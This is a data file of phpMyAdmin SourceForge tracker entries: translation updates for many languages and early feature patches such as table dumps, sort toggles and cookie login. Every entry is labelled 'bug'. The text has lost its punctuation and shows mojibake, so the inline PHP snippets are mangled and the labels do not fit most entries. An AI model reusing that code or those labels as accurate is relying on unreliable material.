Translated by Raquibul Islam ranacse05 gmail.com) Joy Kumar Nag joyruet06 gmail.com) Original URL https sourceforge.net p phpmyadmin translations 822 https sourceforge.net p phpmyadmin translations 822 Original author ranacse05","bug"
"24444","3854","Galician translation update trunk).
Updated e mail address, corrected weird characters and translated new messages.
Original URL https sourceforge.net p phpmyadmin translations 823 https sourceforge.net p phpmyadmin translations 823 Original author xosecalvo","bug"
"24444","3855","Updated Norwegian translation.
Here is the updated translation file for Norwegian based on the phpMyAdmin 2.11.8 rc1 release.
Original URL https sourceforge.net p phpmyadmin translations 824 https sourceforge.net p phpmyadmin translations 824 Original author sven erik","bug"
"24444","3856","Swedish for 3.0.
Swedish translation for phpMyAdmin 3.0 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 825 https sourceforge.net p phpmyadmin translations 825 Original author bjornth","bug"
"24444","3857","Belarusian localization for 3.0.
Belarusian translation for 3.0, both Cyrillic and Latin.
And one small ask.
If it is possible, please change the title of the Belarusian Latin language at the home page in the PMA language combobox.
Now there is xe2x80x9cByelorussian Belarusian latinxe2x80x9d there, so the first word, which means the local title of the language, will be xe2x80x9cBiexc5x82aruskajaxe2x80x9d.
The fourth letter is a latin small letter xe2x80x9clxe2x80x9d with stroke, U 0142) Thank you!
Original URL https sourceforge.net p phpmyadmin translations 826 https sourceforge.net p phpmyadmin translations 826 Original author zedlik","bug"
"24444","3858","Updated Norwegian translation for v3.0.
Here is the updated UTF8 version of the Norwegian language file for v3.0.
Original URL https sourceforge.net p phpmyadmin translations 827 https sourceforge.net p phpmyadmin translations 827 Original author sven erik","bug"
"24444","3859","Italian translation pma 3.0.
Italian translation pma 3.0 Original URL https sourceforge.net p phpmyadmin translations 828 https sourceforge.net p phpmyadmin translations 828 Original author rebeluca","bug"
"24444","3860","Updated Hungarian language file.
The updated Hungarian language file for phpMyAdmin 3.0 is attached Original URL https sourceforge.net p phpmyadmin translations 829 https sourceforge.net p phpmyadmin translations 829 Original author dodika","bug"
"24444","3861","Spanish update for 3.0 beta.
Hi, here is the Spanish translation update for PMA 3.0 beta.
All the very best, Daniel Original URL https sourceforge.net p phpmyadmin translations 830 https sourceforge.net p phpmyadmin translations 830 Original author dhinostroza","bug"
"24444","3862","Romanian translations for 3.0.
New Romanian translations for phpMyAdmin 3.0 Original URL https sourceforge.net p phpmyadmin translations 831 https sourceforge.net p phpmyadmin translations 831 Original author sbivol","bug"
"24444","3863","Catalan translations for 3.0.
Hi Folks!
Here are the translations for 3.0.
Best Regards.
Xavier Navarro.
Original URL https sourceforge.net p phpmyadmin translations 832 https sourceforge.net p phpmyadmin translations 832 Original author xavin","bug"
"24444","3864","Russian for 3.0.
Russian translation.
Based on phpMyAdmin 3.0.0.
With best wishes, from php myadmin.ru.
Original URL https sourceforge.net p phpmyadmin translations 833 https sourceforge.net p phpmyadmin translations 833 Original author hanut","bug"
"24444","3865","Hungarian translation updated.
The updated Hungarian language file for phpMyAdmin 3.0.1 is attached.
Original URL https sourceforge.net p phpmyadmin translations 834 https sourceforge.net p phpmyadmin translations 834 Original author dodika","bug"
"24444","3866","Croatian uptade for 3.0.
Croatian translation updated to version 3.0, insluding small changes in existing translation.
Original URL https sourceforge.net p phpmyadmin translations 835 https sourceforge.net p phpmyadmin translations 835 Original author babalui","bug"
"24444","3867","Finnish update for 3.0.
Here is the updated Finnish language file for pma 3.0.
Several lingual improvements in older strings are also made, so please marge it in such a way that those changes also get in.
Original URL https sourceforge.net p phpmyadmin translations 836 https sourceforge.net p phpmyadmin translations 836 Original author yoneh","bug"
"24444","3868","Polish strDefragment is mistranslated.
The attached patch fixes mistranslation of strDefragment in polish .php.
Original URL https sourceforge.net p phpmyadmin translations 837 https sourceforge.net p phpmyadmin translations 837 Original author ubanus","bug"
"24444","3869","Japanese update for 3.0.
Hi, this is a Japanese translation update lang japanese utf 8.inc.php) for the QA 3 0 branch.
Hope this helps.
Original URL https sourceforge.net p phpmyadmin translations 838 https sourceforge.net p phpmyadmin translations 838 Original author tcool","bug"
"24444","3870","translation of strLogUsername.
As reported in Debian The french translation of phpmyadmin introduce a problem with the length of the string strLogUsername which is too long for display it on one line in the login page.
I suggest to replace this string actually Nom d\ utilisateur ) by this Utilisateur Original URL https sourceforge.net p phpmyadmin translations 839 https sourceforge.net p phpmyadmin translations 839 Original author kink","bug"
"24444","3871","Italian language file causes major bugs.
Italian file fixed by converting all the HTML entities to its UTF8 char Original URL https sourceforge.net p phpmyadmin translations 840 https sourceforge.net p phpmyadmin translations 840 Original author rebeluca","bug"
"24444","3872","Update italian lang file.
Here italian language file take from svn revision 11667 and update some line translate and 1 line with small fix) Original URL https sourceforge.net p phpmyadmin translations 841 https sourceforge.net p phpmyadmin translations 841 Original author fantu","bug"
"24444","3873","Italian language file causes major bugs.
Typo correction Original URL https sourceforge.net p phpmyadmin translations 842 https sourceforge.net p phpmyadmin translations 842 Original author rebeluca","bug"
"24444","3874","Update italian language.
Hello this is an update of italian language because there are some typing errors of the version 3.0.1.
Original URL https sourceforge.net p phpmyadmin translations 843 https sourceforge.net p phpmyadmin translations 843 Original author etms51","bug"
"24444","3875","Norwegian translation.
Wrong translation.. strCheckOverhead = Kontroller overheng ; Should be strCheckOverhead = Merk overheng ; Original URL https sourceforge.net p phpmyadmin translations 844 https sourceforge.net p phpmyadmin translations 844 Original author hanski962","bug"
"24444","3876","Persian Translation update).
Persian Translation update) Original URL https sourceforge.net p phpmyadmin translations 845 https sourceforge.net p phpmyadmin translations 845 Original author goolex","bug"
"24444","3877","Update italian lang file for 3.1.
Italian lang file take from svn 11829 and update Original URL https sourceforge.net p phpmyadmin translations 846 https sourceforge.net p phpmyadmin translations 846 Original author fantu","bug"
"24444","3878","Updated Norwegian language file for 3.1.
Updated Norwegian language file for 3.1, plus updated translators.html correction of e mail address).
Original URL https sourceforge.net p phpmyadmin translations 847 https sourceforge.net p phpmyadmin translations 847 Original author sven erik","bug"
"24444","3879","Hungarian language file for 3.1.0.
Hungarian language file for ver.3.1.0 updated and attached.
Original URL https sourceforge.net p phpmyadmin translations 848 https sourceforge.net p phpmyadmin translations 848 Original author dodika","bug"
"24444","3880","Swedish translation for 3.1.
Swedish translation for 3.1 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 849 https sourceforge.net p phpmyadmin translations 849 Original author bjornth","bug"
"24444","3881","Partial) Polish update.
I am attaching partially updated Polish translation file.
Unfortunately I am no longer able to maintain the translation; please remove my name from the translators list.
Original URL https sourceforge.net p phpmyadmin translations 850 https sourceforge.net p phpmyadmin translations 850 Original author ubanus","bug"
"24444","3882","Catalan translation for 3.1.
Hi guys, This is the catalan translation for the 3.1 Best regards, Xavier Navarro Original URL https sourceforge.net p phpmyadmin translations 851 https sourceforge.net p phpmyadmin translations 851 Original author xavin","bug"
"24444","3883","New Finnish update.
There you go!
Here the newest Finnish update, based on Revision 12043 from repository at trunk phpMyAdmin lang finnish utf 8.inc.php.
Fresh from the oven!
=) Original URL https sourceforge.net p phpmyadmin translations 852 https sourceforge.net p phpmyadmin translations 852 Original author yoneh","bug"
"24444","3884","updated dutch translation.
These last few days I ve made a leap in the number of dutch translated strings.
And improved some of the existing strings.
Strings matching strSetup and strShowStatus are still to be done, hopefully I ll fine some time do those as well.
Original URL https sourceforge.net p phpmyadmin translations 853 https sourceforge.net p phpmyadmin translations 853 Original author helmo","bug"
"24444","3885","Completed dutch translation.
All strings have now been translated.
The diff is not as clean as it could be since I stripped many trailing spaces, and used sort lang.sh.
Additionally I ve updated a few details in the english file as well.
Original URL https sourceforge.net p phpmyadmin translations 854 https sourceforge.net p phpmyadmin translations 854 Original author helmo","bug"
"24444","3886","Dutch translation of the two changed strings.
Here is the patch to again complete the dutch translation.
Original URL https sourceforge.net p phpmyadmin translations 855 https sourceforge.net p phpmyadmin translations 855 Original author helmo","bug"
"24444","3887","Some german translations.
I translated a few strings and changed 2 existing.
Note MySQL privilege names are expressed in English so strGrantOption should be GRANT in all languages...
I also had to add strNoDefault = No default ; because of german grammar.
Original URL https sourceforge.net p phpmyadmin translations 856 https sourceforge.net p phpmyadmin translations 856 Original author virsacer","bug"
"24444","3888","Updated Mongolian, but not completed.
Mongolian translation update.
Not Completed.
Original URL https sourceforge.net p phpmyadmin translations 857 https sourceforge.net p phpmyadmin translations 857 Original author bayaraa","bug"
"24444","3889","polish language update.
update Original URL https sourceforge.net p phpmyadmin translations 858 https sourceforge.net p phpmyadmin translations 858 Original author fixeron","bug"
"24444","3890","Romanian translation for 3.1.
Updated the Romanian translation Original URL https sourceforge.net p phpmyadmin translations 859 https sourceforge.net p phpmyadmin translations 859 Original author sbivol","bug"
"24444","3891","[Italian] wrong word.
There is an error in the Italian translation.
The patch is attached.
Original URL https sourceforge.net p phpmyadmin translations 860 https sourceforge.net p phpmyadmin translations 860 Original author unop2pforum","bug"
"24444","3892","Updated translation for Georgian.
Updated file at last, includes many improvements.
File is merged with english version to help improve merging in future.
Internet community will check it after release and I will finish and update it again.
Original URL https sourceforge.net p phpmyadmin translations 861 https sourceforge.net p phpmyadmin translations 861 Original author gmachitidze","bug"
"24444","3893","Updated Lithuanian translation.
I started working on a long abandoned Lithuanian translation file.
Updated most visible strings, fixed a few typos and translated a few new strings.
Will continue working if everything is OK with the file, otherwise please let me know.
Original URL https sourceforge.net p phpmyadmin translations 862 https sourceforge.net p phpmyadmin translations 862 Original author rytis s","bug"
"24444","3894","More german translations.
...
Original URL https sourceforge.net p phpmyadmin translations 863 https sourceforge.net p phpmyadmin translations 863 Original author virsacer","bug"
"24444","3895","updated 3.2) Chinese Simplified translation.
Chinese Simplified translation for latest development version 3.2.0 dev see attach for details, thanks translator greensea, rimy simple proofread rimy Original URL https sourceforge.net p phpmyadmin translations 864 https sourceforge.net p phpmyadmin translations 864 Original author rimyxp","bug"
"24444","3896","Spanish update for 3.x.
Hi, Here is the update for Spanish 3.x.
I am still missing a few translations but I hope to have the time to handle them next month.
All the very best, Dr. med.
Daniel Hinostroza Original URL https sourceforge.net p phpmyadmin translations 865 https sourceforge.net p phpmyadmin translations 865 Original author dhinostroza","bug"
"24444","3897","Galician translation update.
Galician translation update Original URL https sourceforge.net p phpmyadmin translations 866 Original author xosecalvo","bug"
"24444","3898","Swedish translation for 3.2.
Swedish translation for 3.2 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 867 Original author bjornth","bug"
"24444","3899","Catalan translation for 3.2.
Hi folks!
Here is the zipped catalan translation for phpMyAdmin 3.2 Best regards.
Xavier Navarro.
Original URL https sourceforge.net p phpmyadmin translations 869 Original author xavin","bug"
"24444","3900","Norwegian translation for 3.2.
Norwegian translation for 3.2 Original URL https sourceforge.net p phpmyadmin translations 868 Original author sven erik","bug"
"24444","3901","Finnish translation for 3.2.
Here s Finnish translation for 3.2.
I also updated a few other strings there.
Regards, Jouni Original URL https sourceforge.net p phpmyadmin translations 870 Original author yoneh","bug"
"24444","3902","Hungarian translation for 3.2.
The updated Hungarian language file for version 3.2 is attached.
Original URL https sourceforge.net p phpmyadmin translations 871 Original author dodika","bug"
"24444","3903","Uzbek translation.
Uzbek tranlation Cyrillic and Latin.
Original URL https sourceforge.net p phpmyadmin translations 872 Original author orzu","bug"
"24444","3904","Uzbek translation 3.2.0.
Updated some translations and added new ones for v3.2 Thanks Original URL https sourceforge.net p phpmyadmin translations 873 Original author orzu","bug"
"24444","3905","Update for Arabic ar) translation.
Please add the attached patch which fixes some errors in the Arabic ar) translation.
Original URL https sourceforge.net p phpmyadmin translations 874 Original author meno25","bug"
"24444","3906","Swedish translation for 3.2.1.
Updated Swedish translation new strings and default changed to suggested ) Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 878 Original author bjornth","bug"
"24444","3907","Update for Norwegian translation.
Revised translation related to pmadb and suggested values Original URL https sourceforge.net p phpmyadmin translations 875 Original author sven erik","bug"
"24444","3908","Typo in German translation deshlab).
There is a error in the German translation 3 typo s) Ihre PHP Einstellung session.gc maxlifetime ist niedriger als die in phpMyAdmin konfigurierte Cookiegxc3xbcltigkeit, deshlab wir ihre Anmeldung eher ablaufen als in phpMyAdmin konfiguriert.
deshlab wir ihre gt; deshalb wird Ihre big I, not a small) PMA Version 3.2.0.1) Original URL https sourceforge.net p phpmyadmin translations 880 Original author blackdrake","bug"
"24444","3909","Brazilian Portuguese update.
Translation to brasilian portuguese utf 8 added.
more 30 strings translated.
Original URL https sourceforge.net p phpmyadmin translations 876 Original author fabiobucior","bug"
"24444","3910","200 updated messages for german translation.
tried to update the first 200 untranslated messages in german language file.
some translations might not be the best, but that can still be corrected later on.
Original URL https sourceforge.net p phpmyadmin translations 877 Original author knittl","bug"
"24444","3911","100 german messages.
translated the next 100 messages to german, and changed around 10 authentisierung gt; authentifikation) Original URL https sourceforge.net p phpmyadmin translations 879 Original author knittl","bug"
"24444","3912","Dutch update strTrackingThVersion et al).
I took the freedom to translate the last untranslated Dutch untranslated strings, the ones about the tracker.
I hope they are good enough and that I didn t annoy anyone by translating them.
Original URL https sourceforge.net p phpmyadmin translations 881 Original author scavenger2008","bug"
"24444","3913","Updated Galician translation.
Updated Galician translation Original URL https sourceforge.net p phpmyadmin translations 882 Original author xosecalvo","bug"
"24444","3914","Galician translation update.
Galician translation update trunk Original URL https sourceforge.net p phpmyadmin translations 883 Original author xosecalvo","bug"
"24444","3915","Galician translation update.
Galician translation update Original URL https sourceforge.net p phpmyadmin translations 884 Original author xosecalvo","bug"
"24444","3916","Russian translation update.
Update, based on phpMyAdmin 3.2.3, of the Russian language file.
Original URL https sourceforge.net p phpmyadmin translations 885 Original author hanut","bug"
"24444","3917","Russian translation update.
Russian translation update.
Based on phpMyAdmin 3.3.0 alpha1.
Original URL https sourceforge.net p phpmyadmin translations 886 Original author hanut","bug"
"24444","3918","Greek translation updated for 3.3.
I have updated the greek translation for version 3.3 revision 13215) Original URL https sourceforge.net p phpmyadmin translations 887 Original author papazp","bug"
"24444","3919","Norwegian update for 3.3.
Norwegian update for 3.3 Original URL https sourceforge.net p phpmyadmin translations 888 Original author sven erik","bug"
"24444","3920","Catalan translation for 3.3.
Hi folks!
Here is a zipped file with the catalan translation for 3.3, with some gramatical corrections.
Greetings.
Xavier Navarro Girona Spain.
Original URL https sourceforge.net p phpmyadmin translations 893 Original author xavin","bug"
"24444","3921","Add title.
Add Brazilian Portuguese title for pt BR language in admin locales update file.
Original URL https sourceforge.net p phpmyadmin translations 889 Original author mauriciofauth","bug"
"24444","3922","Finnish update.
Finnish update based on svn 2010 01 14.
Original URL https sourceforge.net p phpmyadmin translations 890 Original author yoneh","bug"
"24444","3923","Language s name.
When add new language with the admin new lang file, add automatically the language s name in the admin locales update file.
Usage .
admin new lang langCode langName Original URL https sourceforge.net p phpmyadmin translations 891 Original author mauriciofauth","bug"
"24444","3924","Lithuanian translation.
Updated Lithuanian translation, based on rev.
13242 file Original URL https sourceforge.net p phpmyadmin translations 892 Original author rytis s","bug"
"24444","3925","the dutch term for renamed is spelled wrong.
If I rename a table in PHPMyAdmin 2.6.4 pl4 with the language set to Dutch nl utf 8) I get this success message Tabel t1 is hernoemt naar t2 The word hernoemt is misspelled and should be spelled with a d at the end hernoemd .
additional questions can be sent to marvelade [monkey s tail] gmail [dot] com Best regards, Georges Bolssens marvelade.com | online application development Original URL https sourceforge.net p phpmyadmin translations 894 Original author anonymous","bug"
"24444","3926","Chinese Simplified translation.
Chinese Simplified translation for latest development version 3.4.0 dev and some update see attach for details, thanks Original URL https sourceforge.net p phpmyadmin translations 895 Original author rimyxp","bug"
"24444","3927","Polish translation update version 2.x.
phpMyAdmin 2.11.11 Polish translation update Original URL https sourceforge.net p phpmyadmin translations 900 Original author jglowacki","bug"
"24444","3928","Turkish translation.
Hello, Turkish translation was updated.
Original URL https sourceforge.net p phpmyadmin translations 896 Original author bourock","bug"
"24444","3929","Translation of new messages into Uzbek.
Translation of new messages into Uzbek language cyrillic and latin) Original URL https sourceforge.net p phpmyadmin translations 897 Original author orzu","bug"
"24444","3930","Update of Greek translation.
I have updated the greek translation!
Original URL https sourceforge.net p phpmyadmin translations 903 Original author panos78","bug"
"24444","3931","Corrections for greek translation.
I have made some corrections and adjustments for 3.3.3 Original URL https sourceforge.net p phpmyadmin translations 898 Original author panos78","bug"
"24444","3932","Polish translation update.
phpMyAdmin 3.3.7 Polish translation update Original URL https sourceforge.net p phpmyadmin translations 899 Original author jglowacki","bug"
"24444","3933","Polish translation update for 3.3. phpMyAdmin 3.3.7 Polish translation update.
Some changes.
Based on phpMyAdmin QA 3 3 20100922 022001.
Original URL https sourceforge.net p phpmyadmin translations 901 Original author jglowacki","bug"
"24444","3934","Polish translation update for 3.3. phpMyAdmin 3.3.7 Polish translation update.
Minor translation fixes.
Based on phpMyAdmin QA 3 3 20100927 022001.
Original URL https sourceforge.net p phpmyadmin translations 902 Original author jglowacki","bug"
"24444","3935","Full German translation.
Full German translation of phpMyAdmin 3.3.9.2 Original URL https sourceforge.net p phpmyadmin translations 904 Original author anonymous","bug"
"24444","3936","hindi translation.
hindi translation added.
Original URL https sourceforge.net p phpmyadmin translations 905 Original author onebighack","bug"
"24444","3937","Traditional Chinese translation for 3.4.x.
Based on the Simplified Chinese, we ve convert update it for using in Taiwan.
Original URL https sourceforge.net p phpmyadmin translations 906 Original author kiang","bug"
"24444","3938","Added translation for some strings in po pt BR.po.
Translation for some strings with no correspondent translation in the pt BR.po file.
Also corrected a typo perfil is not spelled like it was written perfxc3xadl ).
Original URL https sourceforge.net p phpmyadmin translations 907 Original author marcosm","bug"
"24444","3939","Updated Indonesian translation.
There are too many Indonesian strings that are not translated.
It\ s really hard for me to translate online using Pootle.
I\ ve downloaded the latest id.po, run 3.5.0 dev on my machine, and start translating while checking the effect on the actual interface.
I haven\ t finished the translation 67 translated in Poedit), but I believe this translation is much better that what we currently have for Indonesian.
I\ ll continue to translate the id.po and will submit the final file within 1 or 2 weeks since I have other things to do now.
Please inform me if you can\ t accept my translation.
Thanks.
Original URL https sourceforge.net p phpmyadmin translations 908 Original author ivanlanin","bug"
"24444","3940","Current Version in GER Language.
In the German translation is on the home this sentence Versionsinformationen 3.5.0 dev, aktuellste stabile Version 3.4.8 The word aktuellste is not correct.
aktuellste doen t exists in German language.)
The correct sentence in German ist Versionsinformationen 3.5.0 dev, aktuelle stabile Version 3.4.8 Original URL https sourceforge.net p phpmyadmin translations 910 Original author dennis1993","bug"
"24444","3941","Updated Indonesian id.po translation 80 ).
Updated.
I\ m catching up.
Thanks.
Original URL https sourceforge.net p phpmyadmin translations 909 Original author ivanlanin","bug"
"24444","3942","Polish Translation misspelling.
misspelling artykxc3xb3xc5x82 should be artykuxc5x82 , see attachment image for details.
Misspelling is in second sentence of recommendation.
Original URL https sourceforge.net p phpmyadmin translations 911 Original author piotremis","bug"
"24444","3943","Romanian translation bug.
When using the romanian translation included in the version 3.5.1 the left frame doesn t display.
The problem goes away when using the english translation.
Original URL https sourceforge.net p phpmyadmin translations 912 Original author anonymous","bug"
"24444","3944","Bulgarian Translation misspelling.
Hello, There is misspelling in two words in translation.
xd0xa1xd1x8axd0xb7xd0xb4xd0xb0xd0xb1xd0xb0xd0xbdxd0xb5 should be xd0xa1xd1x8axd0xb7xd0xb4xd0xb0xd0xb2xd0xb0xd0xbdxd0xb5 .
Also xd0x97xd0xbfxd0xb0xd0xb7xd0xb2xd0xb0xd0xbdxd0xb5 should be xd0x97xd0xb0xd0xbfxd0xb0xd0xb7xd0xb2xd0xb0xd0xbdxd0xb5 .
See attachment image for details.
Original URL https sourceforge.net p phpmyadmin translations 913 Original author rusanova","bug"
"24444","3945","thai language support.
Here is the thai language file.
It is done by someone at thaidev.com, I suppose.
Original URL https sourceforge.net p phpmyadmin patches 1 https sourceforge.net p phpmyadmin patches 1 Original author korakot","bug"
"24444","3946","change form method type.
Need to change the method type from GET to POST in tbl select.php3 at LINE 19 This due problems when having huge tables with lots of columns and the GET method will not allow so much data.
Original URL https sourceforge.net p phpmyadmin patches 2 https sourceforge.net p phpmyadmin patches 2 Original author anonymous","bug"
"24444","3947","add query box to table page.
To make querying from a specific table easier I do this a lot), a textarea box copy partially from database page) is added.
A default query select from thistable where 1) is given in the box as well Original URL https sourceforge.net p phpmyadmin patches 3 https sourceforge.net p phpmyadmin patches 3 Original author korakot","bug"
"24444","3948","Minor quot; lt;?
quot; fix.
Minor fix for the amp;quot; amp;lt;?
amp;quot; occuring on line 255 of tbl properties.php3 Original URL https sourceforge.net p phpmyadmin patches 4 https sourceforge.net p phpmyadmin patches 4 Original author robbat2","bug"
"24444","3949","Function amp; Data Type improvments.
For config.inc.php3 Added type synoynms for those that prefer them.
Complete change of function table to include most of the MySQL functions.
Original URL https sourceforge.net p phpmyadmin patches 5 https sourceforge.net p phpmyadmin patches 5 Original author robbat2","bug"
"24444","3950","Module for User Administration.
New module for User Administration with the next functions View all users Add Edit Delete users Change Delete user s password Add Revoke Edit user s privileges with any Database Table Columns Check the user privileges with any Database Original URL https sourceforge.net p phpmyadmin patches 6 https sourceforge.net p phpmyadmin patches 6 Original author dvilla","bug"
"24444","3951","here is a improved tabledump code.
Hi, here is a significant increase of table dump precision in function get table def lib.inc.php3) the code support all mysql Indexes, also comments!
just replace the big function with this small code function get table def db, table, crlf)\{ global drop; if MYSQL MAJOR VERSION == amp;quot;3.23 amp;quot;)\{ schema create= amp;quot; amp;quot;; if !empty drop)) schema create .= amp;quot;DROP TABLE IF EXISTS table; crlf amp;quot;; result=mysql query amp;quot;show create table db.
table amp;quot;); if result!=false amp;amp; amp;amp; mysql num rows result) amp;gt;0)\{ tmpres=mysql fetch array result); tmp= tmpres[1]; schema create.=str replace amp;quot;\n amp;quot;, crlf, tmp); \} return schema create; \} return false; \} Steve Alberty alberty neptunlabs.de) Original URL https sourceforge.net p phpmyadmin patches 7 https sourceforge.net p phpmyadmin patches 7 Original author anonymous","bug"
"24444","3952","calling index.php3 with db.
I found it usefull, if you can add call phpMyAdmin with the name of a database which would be displayed as the first page, instead of the main.php3.
The URL would look like phpMyAdmin ?db=database name My new index.php3 is attached.
sorry for my bad English, I m German) Original URL https sourceforge.net p phpmyadmin patches 8 https sourceforge.net p phpmyadmin patches 8 Original author korelstar","bug"
"24444","3953","dump to server file.
Write a dump, or CSV table, output to subdirectory of phpmyadmin called amp;quot;dumpfiles amp;quot; .
It s necessary that this directory has write permission enabled.
Read a sql file , from a directory called sqlscripts.
New field in amp;quot;Run SQL query queries amp;quot; to type the file name of file with SQL commands stored at amp;quot;sqlscripts amp;quot;.
New filed in amp;quot;View dump schema) of database amp;quot; to write the output of dumpfile to directory called amp;quot;dumpfiles amp;quot;.
function get table content change to enhance performance of fields with large strings and send some messages to the browser while dumping to a file.
function get table csv send some messages to the browser while dumping to a file.
Change the files involved with dump function , db dump.php,tbl dump.php,db details.php,tbl properties.
php.
Ricardo Original URL https sourceforge.net p phpmyadmin patches 9 https sourceforge.net p phpmyadmin patches 9 Original author anonymous","bug"
"24444","3954","Optimization stuff.
Submitted by Ricardo in the Open Discussion forum message id 178807) In the get table content function replace for xx=0; xx amp;lt; strlen srcstr); xx ) \{ yy = strlen dummy); if srcstr[ xx] == amp;quot;\\ amp;quot;) dummy .= amp;quot;\\\\ amp;quot;; if srcstr[ xx] == amp;quot; amp;quot;) dummy .= amp;quot;\\ amp;quot;; if srcstr[ xx] == amp;quot;\ amp;quot; amp;quot;) dummy .= amp;quot;\\\ amp;quot; amp;quot;; if srcstr[ xx] == amp;quot;\x00 amp;quot;) dummy .= amp;quot;\\0 amp;quot;; if srcstr[ xx] == amp;quot;\x0a amp;quot;) dummy .= amp;quot;\\n amp;quot;; if srcstr[ xx] == amp;quot;\x0d amp;quot;) dummy .= amp;quot;\\r amp;quot;; if srcstr[ xx] == amp;quot;\x08 amp;quot;) dummy .= amp;quot;\\b amp;quot;; if srcstr[ xx] == amp;quot;\t amp;quot;) dummy .= amp;quot;\\t amp;quot;; if srcstr[ xx] == amp;quot;\x1a amp;quot;) dummy .= amp;quot;\\Z amp;quot;; if strlen dummy) == yy) dummy .= srcstr[ xx]; \} by dummy= srcstr; dummy = str replace amp;quot;\x0a amp;quot;, amp;quot;\\n amp;quot;, dummy); dummy = str replace amp;quot;\\ amp;quot;, amp;quot;\\\\ amp;quot;, dummy); amp;quot;The code runs almost 10 times faster in my case because I have a table with large strings messages posts) amp;quot; Original URL https sourceforge.net p phpmyadmin patches 10 https sourceforge.net p phpmyadmin patches 10 Original author loic1","bug"
"24444","3955","cookie based authentication.
I have found a detailed description, and patch for phpMyAdmin at http articles.areontheweb.com phpMyAdmin This patch changes auth ) function in order to be able to login with php compiled as cgi file with cookie based authentication).
I did not test it.
Advantages not less secure authentication system or even more secure) phpMyAdmin with advanced authentication option enabled could be run on cgi php e.g.
I use php cgi with cgiwrap) Original URL https sourceforge.net p phpmyadmin patches 11 https sourceforge.net p phpmyadmin patches 11 Original author anonymous","bug"
"24444","3956","to protect binary data in blobs.
submitted by Bernard M. Piller for version 2.1.0 Original URL https sourceforge.net p phpmyadmin patches 12 https sourceforge.net p phpmyadmin patches 12 Original author lem9","bug"
"24444","3957","Toggle Column Sorting ASC DESC.
COLUMN SORT TOGGLE Okay... to when browsing) be able to toggle ASC and DESC for that column, change the following in lib.inc.php from sort order=urlencode amp;quot; order by field amp;gt;name cfgOrder amp;quot;); to sort order=urlencode amp;quot; order by field amp;gt;name cfgOrder amp;quot;); if sql order== amp;quot; order by field amp;gt;name ASC amp;quot;)\{ sort order=urlencode amp;quot; order by field amp;gt;name DESC amp;quot;);\} if sql order== amp;quot; order by field amp;gt;name DESC amp;quot;)\{ sort order=urlencode amp;quot; order by field amp;gt;name ASC amp;quot;);\} This could be further optimized to not compare the entire passed sql order GET variable, but to perhaps just regex the amp;quot;ASC amp;quot; or amp;quot;DESC amp;quot; for the IF statements above.
Original URL https sourceforge.net p phpmyadmin patches 13 https sourceforge.net p phpmyadmin patches 13 Original author antipasto","bug"
"24444","3958","Table Edit Inheritence.
EDIT INHERITS TABLE When joining two or more tables, you don t have much control over which of the tables is going to be edited.
ID numbers for the edit process are determined by finding ALL of the primary,etc fields and passing those on.
When you join two tables you need to be careful as to make sure you only have one unique id as the edit page won t be able to make heads or tails of what ID in that table you want to edit.
BUT to make sure that the table specified in the URL string gets passed to the edit functions when browsing do the following Change FROM table = field amp;gt;table; Change TO if strlen trim table))==0)\{ table = field amp;gt;table; \} ... and the FROM occurs in two places, so make sure to change them both.
This is usefule if you just want to use SQL.PHP for editing your own queries by putting the SQL in the URL string.
However, if the table is joined with another where table1.id=table2.id) you don t have any control over the amp;quot;Edit amp;quot; button.
This modification allows the discovery of the table for this button to ONLY be performed if the URL does not contain a table name.
So, but table=table2 to make amp;quot;edit amp;quot; edit table2... etc... MAKE SURE YOU ONLY HAVE ONE ID FIELD in your query... for other IDs use your redundant ID data in that table ie, not the primary id for that table).
Original URL https sourceforge.net p phpmyadmin patches 14 https sourceforge.net p phpmyadmin patches 14 Original author antipasto","bug"
"24444","3959","Bug Improvement in tbl select.
Hi I m running php 3.0.16 MySQL 3.22.34 1 When using quotes in SELECT text entry in tbl select form) leads to a bad formed query.
For example, you can t use myfield like amp;quot;foo amp;quot;.
Correction line 86 version 1.4 devel branch) sql query .= amp;quot; where where amp;quot;; becomes sql query .= amp;quot; where amp;quot;.stripslashes where); 2 To use wildcard ) in numeric fields allowed in MySQL) Lines 101 to 105 same file as above) become else \{ if strstr fields[ i], )) \{ cmp= amp;quot;LIKE amp;quot;; quot= amp;quot;\ amp;quot; amp;quot;; \} else \{ cmp= amp;quot;= amp;quot;; quot= amp;quot; amp;quot;; \} if substr fields[ i],0,1)== amp;quot; amp;lt; amp;quot; || substr fields[ i],0,1)== amp;quot; amp;gt; amp;quot;) cmp= amp;quot; amp;quot;; \} These 2 mods where only tested with my config.
Laurent Haas Original URL https sourceforge.net p phpmyadmin patches 15 https sourceforge.net p phpmyadmin patches 15 Original author efcis","bug"
"24444","3960","Changes to display table.
If browsing a table, display table is used to create the HTML for the resultset.
It creates also link to allow editing a selected row.
This link works fine if there is either a primary key defined.
It also works fine without primary key if no NULL values are present.
The attached lib.inc.php contains a changed version of display table that works also in the presence of NULL values.
The attached file is version 1.28 from the cvs with changes.
Original URL https sourceforge.net p phpmyadmin patches 16 https sourceforge.net p phpmyadmin patches 16 Original author tomy","bug"
"24444","3961","Limit added for table dumps.
Hi, We have added two fields to the generate dump form which allows the user to specify the offset and number of records to dump.
Of Course we have added all the necessary code to the seemingly relevant file.
The modified files can be found in the uploaded tarball Cheers vinay sanisoft.com girish sanisoft.com Original URL https sourceforge.net p phpmyadmin patches 17 https sourceforge.net p phpmyadmin patches 17 Original author anonymous","bug"
"24444","3962","Authentication based on phpPgAdmin.
This is cookie based authentication.
It should be a little cleaned up, but it works for me.
It works with PHP as CGI and there is no problem with relogin or bad passwords.
Original URL https sourceforge.net p phpmyadmin patches 18 https sourceforge.net p phpmyadmin patches 18 Original author anonymous","bug"
"24444","3963","SQL echo in text area optional.
Hi, We have added a checkbox below the textarea where you write queries, unchecking it prevents the query from being echoed.
It is good to have the query handy if you are experimenting BUT having the query returned when you have done a couple of hundred inserts is a pain.
Hence this patch vinay sanisoft.com girish sanisoft.com Original URL https sourceforge.net p phpmyadmin patches 19 https sourceforge.net p phpmyadmin patches 19 Original author tarique","bug"
"24444","3964","Polish translation.
...
Original URL https sourceforge.net p phpmyadmin patches 20 https sourceforge.net p phpmyadmin patches 20 Original author d3xter","bug"
"24444","3965","Drop Table Link on Table Pages.
Have added a link to the table description pages to drop the current table.
Original URL https sourceforge.net p phpmyadmin patches 21 https sourceforge.net p phpmyadmin patches 21 Original author anonymous","bug"
